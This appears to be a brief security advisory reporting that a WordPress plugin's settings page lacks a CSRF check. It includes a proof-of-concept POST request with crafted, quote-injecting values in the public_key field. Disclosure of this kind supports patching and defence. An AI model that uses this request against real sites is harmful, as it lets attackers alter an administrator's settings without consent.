The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.
POST /wp-admin/admin.php?page=brutebank-settings HTTP/1.1
public_key=site.a%22%2522aaaa%3Daaa&secret_key=aaa&update=Update